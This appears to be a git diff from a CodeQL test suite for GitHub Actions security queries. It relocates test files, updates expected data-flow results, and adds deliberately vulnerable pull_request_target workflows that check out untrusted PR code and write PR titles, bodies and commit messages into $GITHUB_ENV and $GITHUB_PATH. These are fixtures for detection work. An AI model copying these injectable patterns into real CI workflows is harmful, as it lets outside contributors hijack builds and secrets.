ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref rename to ql/test/query-tests/Models/CompositeActionsSources.qlref diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Models/CompositeActionsSummaries.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected rename to ql/test/query-tests/Models/CompositeActionsSummaries.expected 
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref rename to ql/test/query-tests/Models/CompositeActionsSummaries.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSinks.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Models/ReusableWorkflowsSources.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSources.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSources.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected 
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref diff --git a/ql/test/query-tests/Security/CWE-020/action1/action.yml b/ql/test/query-tests/Models/action1/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/action1/action.yml rename to ql/test/query-tests/Models/action1/action.yml diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index b6cb2a32e47..715e2c4c90c 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected 
@@ -1,12 +1,12 @@ edges -| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | -| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | -| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | | -| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | | -| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | 
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml new file mode 100644 index 00000000000..78d288fb982 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -0,0 +1,23 @@ +name: publish +on: + pull_request_target: + branches: + - main +jobs: + need-publish: + permissions: + actions: write + name: Need Publish + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Get commit message + run: | + COMMIT_MESSAGE=$(git log --format=%s) + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + - name: Get commit message + run: | + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml new file mode 100644 index 00000000000..93854c5e889 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml @@ -0,0 +1,30 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + 
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml new file mode 100644 index 00000000000..89ecd8c0ec3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -0,0 +1,29 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test3: + runs-on: ubuntu-latest + steps: + - run: | + echo "branch_name=$(jq --raw-output .pull_request.head.ref $GITHUB_EVENT_PATH)" >> $GITHUB_ENV + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index 05bde57551d..806f8dc8e45 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -20,8 +20,6 @@ jobs: contents: write steps: - uses: actions/checkout@v4 - with: - ref: foo - name: Download and Extract Artifacts uses: dawidd6/action-download-artifact@v6 diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index 7fab238795c..851aa524154 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -1,10 +1,9 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title 
| | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index ea360bc56df..5be9f729ad6 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected 
@@ -1,10 +1,9 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title 
| | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 6ad5cf04304..aff785242f9 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,30 +1,29 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | 
.github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | 
pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | 
.github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | 
provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -58,10 +57,10 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r 
'.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | 
